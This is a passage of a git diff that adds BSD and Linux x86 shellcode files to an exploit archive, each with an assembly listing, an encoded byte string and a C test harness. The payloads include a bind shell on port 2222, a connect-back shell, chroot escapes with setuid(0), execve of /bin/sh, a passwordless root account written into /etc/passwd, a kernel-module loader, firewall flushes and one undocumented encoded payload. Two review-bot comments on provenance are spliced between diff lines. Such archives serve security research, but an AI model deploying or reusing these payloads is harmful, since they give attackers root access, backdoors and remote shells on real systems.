0x69622f2f + mov ebx,esp + push eax + push esp + push ebx + mov al,0x3b + push eax + int 0x80 + + +*/ + +char shellcode[] = + "\x31\xc9\x31\xc0\x50\xb0\x17\x50\xcd\x80\x51\xb1\x1e\x6a\x2e" + "\xe2\xfc\xb1\x1e\xfe\xc9\xfe\x04\x0c\xfe\xc9\xe2\xf7\x54\xb0" + "\x3d\x50\xcd\x80\x6a\x06\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80" + "\x89\xc2\x31\xc0\x50\x68\xff\x02\x08\xae\x89\xe0\x6a\x10\x50" + "\x52\x31\xc0\xb0\x68\x50\xcd\x80\x6a\x01\x52\x31\xc0\xb0\x6a" + "\x50\xcd\x80\x31\xc0\x50\x50\x52\xb0\x1e\x50\xcd\x80\xb1\x03" + "\xbb\xff\xff\xff\xff\x89\xc2\x43\x53\x52\xb0\x5a\x50\xcd\x80" + "\xfe\xc9\x75\xf4\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f" + "\x62\x69\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80"; +int +main(void) +{ + int *ret; + ret = (int*)&ret + 2; + (*ret) = shellcode; +} \ No newline at end of file 
diff --git a/shellcodes/bsd_x86/43629.c b/shellcodes/bsd_x86/43629.c new file mode 100644 index 000000000..c58ecfb68 --- /dev/null +++ b/shellcodes/bsd_x86/43629.c @@ -0,0 +1,83 @@ +/* The bind shellcode that opens the shell on 2222nd port + Size 100 bytes + OS *BSD + /rootteam/dev0id (rootteam.void.ru) + dev0id@uncompiled.com + + +BITS 32 + +main: + xor eax,eax + push byte 0x06 + push byte 0x01 + push byte 0x02 + mov al,0x61 + push eax + int 0x80 + mov edx,eax + xor eax,eax + push eax + push long 0xAE0802ff + mov eax,esp + push byte 0x10 + push eax + push edx + xor eax,eax + mov al,0x68 + push eax + int 0x80 + push byte 0x1 + push edx + xor eax,eax + mov al,0x6a + push eax + int 0x80 + xor eax,eax + push eax + push eax + push edx + mov al,0x1e + push eax + int 0x80 + mov cl,3 + mov ebx,-1 + mov edx,eax +main_loop: + inc ebx + push ebx + push edx + mov al,0x5a + push eax + int 0x80 + dec cl + jnz main_loop + xor eax,eax + push eax + push long 0x68732f6e + push long 0x69622f2f + mov ebx,esp + push eax + push esp + push ebx + mov al,0x3b + push eax + int 0x80 + +*/ + +char shellcode[] = + "\x31\xc0\x6a\x06\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80\x89\xc2" + "\x31\xc0\x50\x68\xff\x02\x08\xae\x89\xe0\x6a\x10\x50\x52\x31" + "\xc0\xb0\x68\x50\xcd\x80\x6a\x01\x52\x31\xc0\xb0\x6a\x50\xcd" + "\x80\x31\xc0\x50\x50\x52\xb0\x1e\x50\xcd\x80\xb1\x03\xbb\xff" + "\xff\xff\xff\x89\xc2\x43\x53\x52\xb0\x5a\x50\xcd\x80\xfe\xc9" + "\x75\xf4\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69" + "\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80"; +int +main(void) +{ + int *ret; + ret = (int*)&ret + 2; + (*ret) = shellcode; +} \ No newline at end of file diff --git a/shellcodes/bsd_x86/43632.c b/shellcodes/bsd_x86/43632.c new file mode 100644 index 000000000..c636a9db4 --- /dev/null +++ b/shellcodes/bsd_x86/43632.c 
@@ -0,0 +1,45 @@
+/* The setuid(0)+chroot() shellcode. It is the one of the smallest shellcodes
+ in the !!world!!
+ it will put '../' 10 times
+ Size 34 bytes
+ OS *BSD
+ /rootteam/dev0id (rootteam.void.ru)
+ dev0id@uncompiled.com
+
+BITS 32
+
+ xor ecx,ecx
+ xor eax,eax
+ push eax
+ mov al,0x17
+ push eax
+ int 0x80
+ push ecx
+ mov cl,0x1e
+main_push:
+ push byte 0x2e
+ loop main_push
+ mov cl,0x1e
+main_loop:
+ dec cl
+ inc byte [esp+ecx]
+ dec cl
+ loop main_loop
+ push esp
+ mov al,0x3d
+ push eax
+ int 0x80
+
+*/
+char shellcode[] =
+ "\x31\xc9\x31\xc0\x50\xb0\x17\x50\xcd\x80\x51\xb1\x1e\x6a\x2e"
+ "\xe2\xfc\xb1\x1e\xfe\xc9\xfe\x04\x0c\xfe\xc9\xe2\xf7\x54\xb0"
+ "\x3d\x50\xcd\x80";
+
+int
+main(void)
+{
+ int *ret;
+ ret = (int*)&ret + 2;
+ (*ret) = shellcode;
+}
\ No newline at end of file
diff --git a/shellcodes/bsd_x86/43635.c b/shellcodes/bsd_x86/43635.c
new file mode 100644
index 000000000..c432dccc1
--- /dev/null
+++ b/shellcodes/bsd_x86/43635.c
@@ -0,0 +1,39 @@
+/* One of the smallest chroot shellcodes in the !!world!!
+ it will put '../' 10 times
+ Size 28 bytes
+ OS *BSD
+ /rootteam/dev0id (rootteam.void.ru)
+ dev0id@uncompiled.com
+
+BITS 32
+
+ xor ecx,ecx
+ xor eax,eax
+ push ecx
+ mov cl,0x1e
+main_push:
+ push byte 0x2e
+ loop main_push
+ mov cl,0x1e
+main_loop:
+ dec cl
+ inc byte [esp+ecx]
+ dec cl
+ loop main_loop
+ push esp
+ mov al,0x3d
+ push eax
+ int 0x80
+
+*/
+char shellcode[] =
+ "\x31\xc9\x31\xc0\x51\xb1\x1e\x6a\x2e\xe2\xfc\xb1\x1e\xfe\xc9"
+ "\xfe\x04\x0c\xfe\xc9\xe2\xf7\x54\xb0\x3d\x50\xcd\x80";
+
+int
+main(void)
+{
+ int *ret;
+ ret = (int*)&ret + 2;
+ (*ret) = shellcode;
+}
\ No newline at end of file
diff --git a/shellcodes/bsd_x86/43636.c b/shellcodes/bsd_x86/43636.c
new file mode 100644
index 000000000..0acde29c7
--- /dev/null
+++ b/shellcodes/bsd_x86/43636.c
@@ -0,0 +1,48 @@
+/* One of the smallest chroot shellcodes
+ it will put '../' 10 times
+ Size 40 bytes
+ OS *BSD
+ /rootteam/dev0id (rootteam.void.ru)
+ dev0id@uncompiled.com
+
+
+BITS 32
+
+jmp short callme
+main:
+ pop esi
+ mov edi,esi
+ xor ecx,ecx
+ xor eax,eax
+ push eax
+ mov cl,0x1e
+ mov al,0x2e
+ repne stosb
+ pop eax
+ stosb
+ mov cl,0x1e
+main_loop:
+ dec cl
+ inc byte [esi+ecx]
+ dec cl
+ loop main_loop
+ push esi
+ mov al,0x3d
+ push eax
+ int 0x80
+callme:
+ call main
+*/
+
+char shellcode[] =
+ "\xeb\x21\x5e\x89\xf7\x31\xc9\x31\xc0\x50\xb1\x1e\xb0\x2e\xf2"
+ "\xaa\x58\xaa\xb1\x1e\xfe\xc9\xfe\x04\x0e\xfe\xc9\xe2\xf7\x56"
+ "\xb0\x3d\x50\xcd\x80\xe8\xda\xff\xff\xff";
+
+int
+main(void)
+{
+ int *ret;
+ ret = (int*)&ret + 2;
+ (*ret) = shellcode;
+}
\ No newline at end of file
diff --git a/shellcodes/bsd_x86/43640.c b/shellcodes/bsd_x86/43640.c
new file mode 100644
index 000000000..1e2922914
--- /dev/null
+++ b/shellcodes/bsd_x86/43640.c
@@ -0,0 +1,47 @@
+/*The shellcode calls the symlink() and makes the
+ link to the /bin/sh in the current dir.
+ size = 39 bytes
+ OS = *BSD
+ written by /rootteam/dev0id (rootteam.void.ru)
+
+
+BITS 32
+jmp short callme
+main:
+ pop esi
+ xor eax,eax
+ mov byte [esi+7],al
+ mov byte [esi+10],al
+ lea ebx,[esi+8]
+ push ebx
+ lea ebx,[esi]
+ push ebx
+ mov al,57
+ push eax
+ int 0x80
+
+callme:
+ call main
+ db '/bin/sh#sh#'
+*/
+
+char shellcode[] =
+ "\xeb\x15\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x8d\x5e\x08\x53"
+ "\x8d\x1e\x53\xb0\x39\x50\xcd\x80\xe8\xe6\xff\xff\xff\x2f\x62"
+ "\x69\x6e\x2f\x73\x68\x23\x73\x68\x23";
+
+
+
+
+
+
+
+int
+main (void)
+{
+ void (*code)(void);
+ code=(void(*)())shellcode;
+ (void)code();
+ return 0;
+
+}
\ No newline at end of file
diff --git a/shellcodes/bsd_x86/43642.c b/shellcodes/bsd_x86/43642.c
new file mode 100644
index 000000000..177dd4fde
--- /dev/null
+++ b/shellcodes/bsd_x86/43642.c
@@ -0,0 +1,58 @@
+/*************************************************************
+writes the line for user in /etc/passwd with uid&gid == 0
+OS: *BSD
+length: 74
+ written by dev0id dev0id@mail.ru (rootteam.void.ru)
+ #rus-sec /Efnet.org
+greetz:
+ mig
+ nerf
+
+*************************************************************
+BITS 32
+main:
+ xor eax,eax
+ push eax
+ push byte 0x64
+ push word 0x7773
+ push long 0x7361702f
+ push long 0x6374652f
+ mov ebx,esp
+ mov al,0x0a
+ push eax
+ push ebx
+ mov al,5
+ push eax
+ int 0x80
+
+
+ mov edx,eax
+
+ push long 0x0a206873
+ push long 0x2f6e6962
+ push long 0x2f3a2f3a
+ push long 0x313a303a
+ push long 0x303a3a31
+ mov ebx,esp
+ mov al,20
+ push eax
+ push ebx
+ push edx
+ mov al,4
+ push eax
+ int 0x80
+
+ mov al,1
+ push eax
+ int 0x80
+
+*************************************************************
+
+
+
+char shellcode[] =
+ "\x31\xc0\x50\x6a\x64\x66\x68\x73\x77\x68\x2f\x70\x61\x73\x68"
+ "\x2f\x65\x74\x63\x89\xe3\xb0\x0a\x50\x53\xb0\x05\x50\xcd\x80"
+ "\x89\xc2\x68\x73\x68\x20\x0a\x68\x62\x69\x6e\x2f\x68\x3a\x2f"
+ "\x3a\x2f\x68\x3a\x30\x3a\x31\x68\x31\x3a\x3a\x30\x89\xe3\xb0"
+ "\x14\x50\x53\x52\xb0\x04\x50\xcd\x80\xb0\x01\x50\xcd\x80";
\ No newline at end of file
diff --git a/shellcodes/bsd_x86/43644.asm b/shellcodes/bsd_x86/43644.asm
new file mode 100644
index 000000000..4271acc44
--- /dev/null
+++ b/shellcodes/bsd_x86/43644.asm
@@ -0,0 +1,50 @@
+/*
+simply execve_binsh+seteuid(0) shellcode in 31 bytes
+written on nasm - my first nasm exp.
+greetz2:
+ mig #darknet /EFnet.org
+ nerf #nerf /EFnet.org
+ dev0id #rus-sec /EFnet.org (rootteam.void.ru)
+*/
+
+char shellcode[] =
+ "\x31\xc0\x50\xb0\xb7\xcd\x80\x50\x31\xc0\x50\x68\x2f\x2f\x73"
+ "\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd"
+ "\x80";
+void
+main()
+{
+ int *ret;
+ ret=(int*)&ret+2;
+ (*ret)=(int)shellcode;
+}
+
+/****************************************
+--------------start---------------------
+BITS 32
+
+main:
+ xor eax,eax
+ push eax
+ mov al,183
+ int 0x80
+ push eax
+ xor eax,eax
+ push eax
+ push long 0x68732f2f
+ push long 0x6e69622f
+ mov ebx,esp
+ push eax
+ push esp
+ push ebx
+ mov al,59
+ push eax
+ int 0x80
+
+ ;mov al,1 need exit? I do not!
+ ;push eax
+ ;int 0x80
+---------------end----------------------
+compilation:
+ %nasm code.s -o code
+****************************************/
\ No newline at end of file
diff --git a/shellcodes/bsd_x86/43645.asm b/shellcodes/bsd_x86/43645.asm
new file mode 100644
index 000000000..16168a480
--- /dev/null
+++ b/shellcodes/bsd_x86/43645.asm
@@ -0,0 +1,46 @@
+/*
+simply execve_binsh shellcode in 28 bytes
+written on nasm - my first nasm exp.
+greetz2:
+ mig #darknet /EFnet.org
+ dev0id #rus-sec /EFnet.org (rootteam.void.ru)
+*/
+char shellcode[] =
+ "\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56\xb0\x3b\x50\xcd"
+ "\x80\xe8\xed\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
+
+void
+main()
+{
+ int *ret;
+ ret=(int*)&ret+2;
+ (*ret)=(int)shellcode;
+}
+
+/****************************************
+nasm code is:
+---------------start--------------------
+BITS 32
+
+jmp short path
+main:
+ pop esi
+ xor eax,eax
+ mov byte [esi+7],al
+ push eax
+ push eax
+ push esi
+ mov al,59
+ push eax
+ int 0x80
+
+ ;mov al,1 need ? I do not!
+ ;push eax
+ ;int 0x80
+path:
+ call main
+ db '/bin/sh'
+---------------end----------------------
+compilation:
+ %nasm code.s -o code
+****************************************/
\ No newline at end of file
diff --git a/shellcodes/linux_x86/13452.c b/shellcodes/linux_x86/13452.c
index 52d8e4c31..5d70f6b06 100644
--- a/shellcodes/linux_x86/13452.c
+++ b/shellcodes/linux_x86/13452.c
@@ -1,47 +1,40 @@
-/* The setuid(0)+chroot() shellcode. It is the one of the smallest shellcodes
+/* The chroot() shellcode. It is the one of the smallest shellcodes
 in the !!world!!
 it will put '../' 10 times
- Size 34 bytes
- OS *BSD
- /rootteam/dev0id (www.sysworld.net)
+ Size 28 bytes
+ OS Linux
+ /rootteam/dev0id (rootteam.void.ru)
 dev0id@uncompiled.com
 BITS 32
-
+main:
 xor ecx,ecx
 xor eax,eax
- push eax
- mov al,0x17
- push eax
- int 0x80
 push ecx
- mov cl,0x1e
+ mov cl,30
 main_push:
 push byte 0x2e
 loop main_push
- mov cl,0x1e
-main_loop:
+ mov cl,30
+main_inc:
 dec cl
 inc byte [esp+ecx]
 dec cl
- loop main_loop
- push esp
- mov al,0x3d
- push eax
+ loop main_inc
+ mov ebx,esp
+ mov al,61
 int 0x80
-*/
-char shellcode[] =
- "\x31\xc9\x31\xc0\x50\xb0\x17\x50\xcd\x80\x51\xb1\x1e\x6a\x2e"
- "\xe2\xfc\xb1\x1e\xfe\xc9\xfe\x04\x0c\xfe\xc9\xe2\xf7\x54\xb0"
- "\x3d\x50\xcd\x80";
+*/
+
+char shellcode[] =
+ "\x31\xc9\x31\xc0\x51\xb1\x1e\x6a\x2e\xe2\xfc\xb1\x1e\xfe\xc9"
+ "\xfe\x04\x0c\xfe\xc9\xe2\xf7\x89\xe3\xb0\x3d\xcd\x80";
 int
 main(void)
 {
 int *ret;
 ret = (int*)&ret + 2;
 (*ret) = shellcode;
-}
-
-// milw0rm.com [2004-09-12]
\ No newline at end of file
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86-64/13670.c b/shellcodes/linux_x86/13670.c
similarity index 100%
rename from shellcodes/linux_x86-64/13670.c
rename to shellcodes/linux_x86/13670.c
diff --git a/shellcodes/linux/14234.c b/shellcodes/linux_x86/14234.c
similarity index 100%
rename from shellcodes/linux/14234.c
rename to shellcodes/linux_x86/14234.c
diff --git a/shellcodes/linux/14276.c b/shellcodes/linux_x86/14276.c
similarity index 100%
rename from shellcodes/linux/14276.c
rename to shellcodes/linux_x86/14276.c
diff --git a/shellcodes/linux_x86/43626.c b/shellcodes/linux_x86/43626.c
new file mode 100644
index 000000000..ca943732d
--- /dev/null
+++ b/shellcodes/linux_x86/43626.c
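Review bot: The rewrite of 13452.c drops the `// milw0rm.com [2004-09-12]` trailer, which was the only line tying this archive entry to its original source and date, while every other line of the file is replaced (the BSD setuid+chroot variant becomes a Linux chroot-only variant, and the author URL changes from `www.sysworld.net` to `rootteam.void.ru`). For an archive whose value is provenance, a content swap under an unchanged id with no surviving origin line makes the entry's history unrecoverable from the file itself. Keep the trailer, or replace it with a line of the form `// Source: milw0rm.com [2004-09-12]; content replaced by Linux variant in <commit — placeholder>`. The displaced BSD listing appears to be re-added in this commit as shellcodes/bsd_x86/43632.c, so cross-referencing it from the trailer would also help.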
@@ -0,0 +1,9 @@
+unsigned char scode[] =
+"\x29\xc9\x83\xe9\xe9\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xfd"
+"\x96\x34\xe4\x83\xeb\xfc\xe2\xf4\xcc\x5f\xbd\x2f\x97\xd0\x6c\x29"
+"\x7d\xfc\x31\xbc\xcc\x5f\x65\x8c\x8e\xe5\x43\x80\x95\xb9\x1b\x94"
+"\x9c\xfe\x1b\x81\x89\xf5\xbd\x07\xbc\x23\x30\x29\x7d\x05\xdc\xc6"
+"\xfd\x96\x34\x90\xcd\xa6\x46\xde\xbc\xd7\x6d\xaf\xaa\xc0\x5e\xb6"
+"\xb1\xa0\x5e\x8f\xb4\xac\x04\xde\xcd\xac\x0e\xcb\xc7\xb9\x56\x8d"
+"\x93\xb9\x47\x8c\xf7\xcf\xbf\xb5\x01\xfc\x30\xbc\x30\x16\x5e\xe5"
+"\xa5\x5b\xb4\xe4";
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43630.c b/shellcodes/linux_x86/43630.c
new file mode 100644
index 000000000..3cc4dc71b
--- /dev/null
+++ b/shellcodes/linux_x86/43630.c
@@ -0,0 +1,48 @@
+/* The shellcode sets uid == 0 and loads the kernel module from /tmp/o.o
+
+ size = 67 bytes
+ OS = Linux i386
+ written by /rootteam/dev0id (rootteam.void.ru)
+ dev0id@uncompiled.com
+
+BITS 32
+
+jmp short callme
+main:
+ pop esi
+ xor eax,eax
+ xor ebx,ebx
+ mov al,23
+ int 0x80
+ mov byte [esi+12],al
+ mov byte [esi+21],al
+ mov long [esi+22],esi
+ lea ebx,[esi+13]
+ mov long [esi+26],ebx
+ mov long [esi+30],eax
+ mov al,0x0b
+ mov ebx,esi
+ lea ecx,[esi+22]
+ lea edx,[esi+30]
+ int 0x80
+
+
+callme:
+ call main
+ db '/sbin/insmod#/tmp/o.o'
+*/
+
+char shellcode[] =
+ "\xeb\x27\x5e\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x88\x46\x0c\x88"
+ "\x46\x15\x89\x76\x16\x8d\x5e\x0d\x89\x5e\x1a\x89\x46\x1e\xb0"
+ "\x0b\x89\xf3\x8d\x4e\x16\x8d\x56\x1e\xcd\x80\xe8\xd4\xff\xff"
+ "\xff\x2f\x73\x62\x69\x6e\x2f\x69\x6e\x73\x6d\x6f\x64\x23\x2f"
+ "\x74\x6d\x70\x2f\x6f\x2e\x6f";
+int
+main()
+{
+
+ int *ret;
+ ret = (int *)&ret + 2;
+ (*ret) = (int)shellcode;
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43631.c b/shellcodes/linux_x86/43631.c
new file mode 100644
index 000000000..204b4ce4b
--- /dev/null
+++ b/shellcodes/linux_x86/43631.c
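Review bot: 43626.c is committed as a bare `unsigned char scode[]` byte string with no header comment at all — no author, date, target platform, or one-line description of what the bytes do — and no readable source listing, unlike every other new file in this commit. An archive entry that can only be understood by disassembling it is hard to review and impossible to attribute, and the array name `scode` gives no hint either. A header of the form `/* <origin/author — placeholder>, <date — placeholder>: linux/x86, <one-line description — placeholder> */` at the top of the file would bring it in line with the rest of the directory.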
@@ -0,0 +1,50 @@
+/* The setuid(0)+chroot() shellcode. It is the one of the smallest shellcodes
+ in the !!world!!
+ it will put '../' 10 times
+ Size 34 bytes
+ OS Linux
+ /rootteam/dev0id (rootteam.void.ru)
+ dev0id@uncompiled.com
+
+BITS 32
+main:
+ xor ecx,ecx
+ xor eax,eax
+ xor ebx,ebx
+ mov al,23
+ int 0x80
+ push ecx
+ mov cl,30
+main_push:
+ push byte 0x2e
+ loop main_push
+ mov cl,30
+main_inc:
+ dec cl
+ inc byte [esp+ecx]
+ dec cl
+ loop main_inc
+ mov ebx,esp
+ mov al,61
+ int 0x80
+
+
+
+
+
+
+
+
+*/
+
+char shellcode[] =
+ "\x31\xc9\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x51\xb1\x1e\x6a\x2e"
+ "\xe2\xfc\xb1\x1e\xfe\xc9\xfe\x04\x0c\xfe\xc9\xe2\xf7\x89\xe3"
+ "\xb0\x3d\xcd\x80";
+int
+main(void)
+{
+ int *ret;
+ ret = (int*)&ret + 2;
+ (*ret) = shellcode;
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43637.c b/shellcodes/linux_x86/43637.c
new file mode 100644
index 000000000..215b117f2
--- /dev/null
+++ b/shellcodes/linux_x86/43637.c
@@ -0,0 +1,52 @@
+/* The shellcode flushs the iptables by running /sbin/iptables -F
+ then exit()
+ greetz to zilion: man, my code is shorter!
+
+ size = 64 bytes
+ OS = Linux i386
+ written by /rootteam/dev0id (rootteam.void.ru)
+
+
+BITS 32
+
+jmp short callme
+main:
+ pop esi
+ xor eax,eax
+ mov byte [esi+14],al
+ mov byte [esi+17],al
+ mov long [esi+18],esi
+ lea ebx,[esi+15]
+ mov long [esi+22],ebx
+ mov long [esi+26],eax
+ mov al,0x0b
+ mov ebx,esi
+ lea ecx,[esi+18]
+ lea edx,[esi+26]
+ int 0x80
+ mov al,0x01
+ xor ebx,ebx
+ int 0x80
+
+
+callme:
+ call main
+ db '/sbin/iptables#-F#'
+*/
+
+
+char shellcode[] =
+ "\xeb\x27\x5e\x31\xc0\x88\x46\x0e\x88\x46\x11\x89\x76\x12\x8d"
+ "\x5e\x0f\x89\x5e\x16\x89\x46\x1a\xb0\x0b\x89\xf3\x8d\x4e\x12"
+ "\x8d\x56\x1a\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xd4\xff\xff"
+ "\xff\x2f\x73\x62\x69\x6e\x2f\x69\x70\x74\x61\x62\x6c\x65\x73"
+ "\x23\x2d\x46\x23";
+
+
+int main()
+{
+
+ int *ret;
+ ret = (int *)&ret + 2;
+ (*ret) = (int)shellcode;
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43638.c b/shellcodes/linux_x86/43638.c
new file mode 100644
index 000000000..00ae78a49
--- /dev/null
+++ b/shellcodes/linux_x86/43638.c
@@ -0,0 +1,52 @@
+/* The shellcode flushs the ipchains table by running /sbin/ipchains -F
+ then exit()
+ greetz to zilion: man, my code is shorter!
+
+ size = 64 bytes
+ OS = Linux i386
+ written by /rootteam/dev0id (rootteam.void.ru)
+
+
+BITS 32
+
+jmp short callme
+main:
+ pop esi
+ xor eax,eax
+ mov byte [esi+14],al
+ mov byte [esi+17],al
+ mov long [esi+18],esi
+ lea ebx,[esi+15]
+ mov long [esi+22],ebx
+ mov long [esi+26],eax
+ mov al,0x0b
+ mov ebx,esi
+ lea ecx,[esi+18]
+ lea edx,[esi+26]
+ int 0x80
+ mov al,0x01
+ xor ebx,ebx
+ int 0x80
+
+
+callme:
+ call main
+ db '/sbin/ipchains#-F#'
+*/
+
+
+char shellcode[] =
+ "\xeb\x27\x5e\x31\xc0\x88\x46\x0e\x88\x46\x11\x89\x76\x12\x8d"
+ "\x5e\x0f\x89\x5e\x16\x89\x46\x1a\xb0\x0b\x89\xf3\x8d\x4e\x12"
+ "\x8d\x56\x1a\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xd4\xff\xff"
+ "\xff\x2f\x73\x62\x69\x6e\x2f\x69\x70\x63\x68\x61\x69\x6e\x73"
+ "\x23\x2d\x46\x23";
+
+
+int main()
+{
+
+ int *ret;
+ ret = (int *)&ret + 2;
+ (*ret) = (int)shellcode;
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43639.c b/shellcodes/linux_x86/43639.c
new file mode 100644
index 000000000..6b69ce500
--- /dev/null
+++ b/shellcodes/linux_x86/43639.c
@@ -0,0 +1,47 @@
+/* The shellcode flushs the ipchains table by running /sbin/ipchains -F
+ no exit()
+ greetz to zilion: man, my code is shorter!
+
+ size = 58 bytes
+ OS = Linux i386
+ written by /rootteam/dev0id (rootteam.void.ru)
+
+
+BITS 32
+
+jmp short callme
+main:
+ pop esi
+ xor eax,eax
+ mov byte [esi+14],al
+ mov byte [esi+17],al
+ mov long [esi+18],esi
+ lea ebx,[esi+15]
+ mov long [esi+22],ebx
+ mov long [esi+26],eax
+ mov al,0x0b
+ mov ebx,esi
+ lea ecx,[esi+18]
+ lea edx,[esi+26]
+ int 0x80
+
+
+callme:
+ call main
+ db '/sbin/ipchains#-F#'
+;*/
+
+char shellcode[] =
+ "\xeb\x21\x5e\x31\xc0\x88\x46\x0e\x88\x46\x11\x89\x76\x12\x8d"
+ "\x5e\x0f\x89\x5e\x16\x89\x46\x1a\xb0\x0b\x89\xf3\x8d\x4e\x12"
+ "\x8d\x56\x1a\xcd\x80\xe8\xda\xff\xff\xff\x2f\x73\x62\x69\x6e"
+ "\x2f\x69\x70\x63\x68\x61\x69\x6e\x73\x23\x2d\x46\x23";
+
+
+int main()
+{
+
+ int *ret;
+ ret = (int *)&ret + 2;
+ (*ret) = (int)shellcode;
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43641.c b/shellcodes/linux_x86/43641.c
new file mode 100644
index 000000000..167bc6455
--- /dev/null
+++ b/shellcodes/linux_x86/43641.c
@@ -0,0 +1,59 @@
+/*The shellcode calls the symlink() and makes the
+ link to the /bin/sh in the current dir.
+ size = 36 bytes
+ OS = Linux i386
+ written by /rootteam/dev0id (rootteam.void.ru)
+
+
+
+ BITS 32
+
+jmp short callit
+
+doit:
+
+pop esi
+xor eax,eax
+mov byte [esi+7],al
+mov byte [esi+10],al
+mov byte al,83
+lea ebx,[esi]
+lea ecx,[esi+8]
+int 0x80
+
+
+callit:
+call doit
+
+db '/bin/sh#sh#'
+*/
+
+char shellcode[]=
+"\xEB\x12"
+"\x5E"
+"\x31\xC0"
+"\x88\x46\x07"
+"\x88\x46\x0A"
+"\xB0\x53"
+"\x8D\x1E\x8D\x4E"
+"\x08\xCD"
+"\x80\xE8\xE9"
+"\xFF"
+"\xFF"
+"\xFF\x2F"
+"\x62\x69\x6E"
+"\x2F"
+"\x73\x68"
+"\x23\x73\x68"
+"\x23";
+
+
+int
+main (void)
+{
+ void (*code)(void);
+ code=(void(*)())shellcode;
+ (void)code();
+ return 0;
+
+}
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43643.c b/shellcodes/linux_x86/43643.c
new file mode 100644
index 000000000..b05fa1547
--- /dev/null
+++ b/shellcodes/linux_x86/43643.c
@@ -0,0 +1,56 @@
+/*************************************************************
+This shellcode writes to /etc/passwd the string for the user
+with uid&gid == 0;
+ written by dev0id dev0id@mail.ru (rootteam.void.ru)
+ #rus-sec /Efnet.org
+greetz:
+ nerf
+ w00w00
+*************************************************************
+
+BITS 32
+jmp short path
+main:
+ pop esi
+ xor eax,eax
+ push eax
+ mov byte [esi+11],al
+ mov al,0x0a
+ push eax
+ push esi
+ mov al,5
+ push eax
+ int 0x80
+
+
+ mov edx,eax
+
+ push long 0x0a206873
+ push long 0x2f6e6962
+ push long 0x2f3a2f3a
+ push long 0x313a303a
+ push long 0x303a3a31
+ mov ebx,esp
+ mov al,20
+ push eax
+ push ebx
+ push edx
+ mov al,4
+ push eax
+ int 0x80
+
+ mov al,1
+ push eax
+ int 0x80
+path:
+ call main
+ db "/etc/passwd#"
+
+********************************************************************/
+char shellcode[] =
+ "\xeb\x3c\x5e\x31\xc0\x50\x88\x46\x0b\xb0\x0a\x50\x56\xb0\x05"
+ "\x50\xcd\x80\x89\xc2\x68\x73\x68\x20\x0a\x68\x62\x69\x6e\x2f"
+ "\x68\x3a\x2f\x3a\x2f\x68\x3a\x30\x3a\x31\x68\x31\x3a\x3a\x30"
+ "\x89\xe3\xb0\x14\x50\x53\x52\xb0\x04\x50\xcd\x80\xb0\x01\x50"
+ "\xcd\x80\xe8\xbf\xff\xff\xff\x2f\x65\x74\x63\x2f\x70\x61\x73"
+ "\x73\x77\x64\x23";
\ No newline at end of file
diff --git a/shellcodes/linux_x86/43646.c b/shellcodes/linux_x86/43646.c
new file mode 100644
index 000000000..f92bfb5d2
--- /dev/null
+++ b/shellcodes/linux_x86/43646.c
@@ -0,0 +1,88 @@
+/*
+Connecting shellcode written by lamagra
+http://lamagra.seKure.de
+
+May 2000
+
+.file "connect"
+.version "01.01"
+.text
+ .align 4
+_start:
+ #socket(AF_INET,SOCK_STREAM,IPPROTO_IP);
+ movl %esp,%ebp
+ xorl %edx,%edx
+ movb $102,%edx
+ movl %edx,%eax # 102 = socketcall
+ xorl %ecx,%ecx
+ movl %ecx,%ebx
+ incl %ebx # socket()
+ movl %ebx, -8(%ebp) # 1 = SOCK_STREAM
+ incl %ebx
+ movl %ebx, -12(%ebp) # 2 = AF_INET
+ decl %ebx # 1 = SYS_socket
+ movl %ecx, -4(%ebp) # 0 = IPPROTO_IP
+ leal -12(%ebp),%ecx # put args in correct place
+ int $0x80 # switch to kernel-mode
+ xorl %ecx,%ecx
+ movl %eax,-12(%ebp) # save the fd
+
+ # connect(fd,(struct sockaddr *)&struct,16);
+ incl %ebx
+ movw %ebx,-20(%ebp) # 2 = PF_INET
+ movw $9999,-18(%ebp) # 9999 = htons(3879);
+ movl $0x100007f,-16(%ebp) # htonl(IP)
+ leal -20(%ebp),%eax # struct sockaddr
+ movl %eax,-8(%ebp) # load the struct
+ movb $16,-4(%ebp) # 16 = sizeof(sockaddr)
+ movl %edx,%eax # 102 = socketcall
+ incl %ebx # 3 = SYS_connect
+ leal -12(%ebp),%ecx # put args in place
+ int $0x80 # call socketcall()
+
+ # dup2(fd,0-1-2)
+ xorl %ecx,%ecx
+ movb $63,%eax # 63 = dup2()
+ int $0x80
+ incl %ecx
+ cmpl $3,%ecx
+ jne -0xa
+
+ # arg[0] = "/bin/sh"
+ # arg[1] = 0x0
+ # execve(arg[0],arg);
+ jmp 0x18
+ popl %esi
+ movl %esi,0x8(%ebp)
+ xorl %eax,%eax
+ movb %eax,0x7(%esi)
+ movl %eax,0xc(%ebp)
+ movb $0xb,%al
+ movl %esi,%ebx
+ leal 0x8(%ebp),%ecx
+ leal 0xc(%ebp),%edx
+ int $0x80
+ call -0x1d
+ .string "/bin/sh"
+*/
+
+#define NAME "connecting"
+
+char code[]=
+"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
+"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
